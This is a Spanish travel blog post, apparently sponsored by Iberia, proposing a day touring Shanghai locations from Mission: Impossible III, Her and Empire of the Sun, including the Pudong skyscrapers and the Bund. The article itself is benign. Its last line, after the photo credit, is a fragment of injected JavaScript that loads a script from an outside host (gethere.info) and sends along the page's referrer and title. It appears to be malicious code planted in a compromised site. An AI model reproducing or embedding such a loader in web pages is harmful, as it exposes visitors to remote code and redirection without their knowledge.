24 horas en Shanghái y sus rincones de cine

12/09/2016

Pudong, en Shangai

Cuando Christian Bale era pequeñito, Spielberg lo puso a protagonizar El Imperio del Sol (¡y qué interpretación!). Se trata de uno esos peliculones que tuvieron su momento en Shanghái, como lo han tenido muchas otras películas de ayer, hoy y siempre. La ciudad china es tan apasionante, que nos preguntamos si King Kong elegiría hoy para sus andanzas uno de los impactantes rascacielos del futurista distrito de Pudong, en Shanghái, en lugar del Empire State Building.

Volviendo a la ciudad que nos ocupa, lo que os proponemos en esta ocasión es pasar 24 horas de cine en los rincones más fotogénicos de la urbe que yace en el delta del río Yangtsé. ¿Y cómo? Lo haremos a través de las tres películas para los tres momentos del día de un viajero en Shanghái. ¡Qué comience el espectáculo!

Por la mañana: Misión imposible 3 

La mañana empieza cargada de acción y edificios altos, todo porque la mayoría de escenas de la película que se rodaron en Shanghái tomaron como escenario los alrededores del Bund, la espectacular avenida de estilo colonial junto al río Huang Pu, y los rascacielos más famosos del entorno futurista de la otra orilla.

Todo paseo que se precie por los edificios más altos de Shanghái tiene un nombre: el distrito de Pudong, donde todo es a lo grande. ¿Comentamos algunos ejemplos?

  1. La Torre de Shanghái. Con 632 metros, es el edificio más alto China. No contento con reinar en su país, es además el segundo rascacielos más alto del mundo, solo superado por el Burj Khalifa.
  2. El Shanghai World Financial Center. La emoción nos asaltará ante las 101 plantas y casi 500 metros de altura del edificio que hasta 2015 fuera cima de Shanghái y de China. Además, el Shanghai World Financial Center –el cuarto  rascacielos más alto del mundo- contiene la plataforma de observación más elevada de todo el planeta.
  3. La Torre de la Perla Oriental. Esa torre de televisión – la quinta más alta del mundo-, esa que llama la atención en el contorno de Pudong, es el tercer edificio más alto de Shanghái. La agitación nos embestirá ante las dos esferas y la estructura de hormigón de tan apasionante creación arquitectónica, que se asemeja a un cohete presto a salir disparado en cualquier instante. En su interior, la torre cuenta con dos grandes alicientes; por un lado, a 350 metros de altura contiene el mirador conocido como “Módulo Espacial”, cuyas vistas a través del suelo de cristal son de infarto. Por otro lado, la base alberga el Museo de Historia de la ciudad.
  4. La Jin Mao Tower. Cual gigantes enfrentados, junto al Shangai World Financial Center se encuentra la Jin Mao Tower, diploma de consolación en esta particular competición de alturas. Se trata sin duda de uno de los rascacielos más especiales de Shanghái, quizá del mundo entero. Un edificio que roza la perfección al combinar con maestría elementos de la arquitectura tradicional china y rasgos de la más pura postmodernidad. Curiosamente, su estructura gira en torno al número 8, el de la prosperidad en China.

Por la tarde: Her

La tarde por Shanghái es para Her, para las emociones. La futurista película, que por arte del cine se desarrolla en Los Ángeles, realmente fue rodada parcialmente en nuestro Pudong, en el barrio de los rascacielos de Shanghái.

Durante los intimistas y largos paseos del protagonista –Theodore- en compañía de la voz –Samantha-, la cámara nos lleva a rozar con la mirada algunos de los apuestos edificios con cuyo contorno se dibuja el vanguardista perfil de Shanghái. Si escrutamos la pantalla con detenimiento, observaremos por ejemplo que, en una de las escenas, Joaquin Phoenix deambula a los pies de la Torre de la Perla Oriental.

Por cierto. Si alguna vez nos hemos preguntado por el paradero real del flamante apartamento de Theodore, que sepamos que no, que no es Shanghái donde lo encontraremos, sino en el último piso de la Torre de lujo WaterMarke situado en pleno centro de Los Ángeles (705 West 9th Street).

Por la noche: El imperio del sol.

A una hora en metro de Pudong y al otro lado del río se encuentra uno de los centros comerciales más conocidos de la ciudad, el Shanghai Times Square. Precisamente, fue en esa zona donde se rodaron algunas de las escenas de la película con la que abrimos este texto. Lo mismo pasa con el cercano parque Yanzhong Guangchang, al que se puede llegar caminando y en el que se puede descansar del bullicio de los alrededores. Y mientras el sol cae, recorreremos estos rincones imprescindibles de Shanghái, y diremos adiós a un gran día en una gran ciudad.

Viajemos a China, viajemos a Shanghái. De ella dicen que es diferente, que es más cosmopolita. También afirman que el diálogo con ella es fácil, que es más amiga. Digan lo que digan, nosotros a lo nuestro, a volar hacia el embrujo de Shanghái, a vivir –siempre de la mano de Iberia- historias futuristas y de cine.

Foto| Josh

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;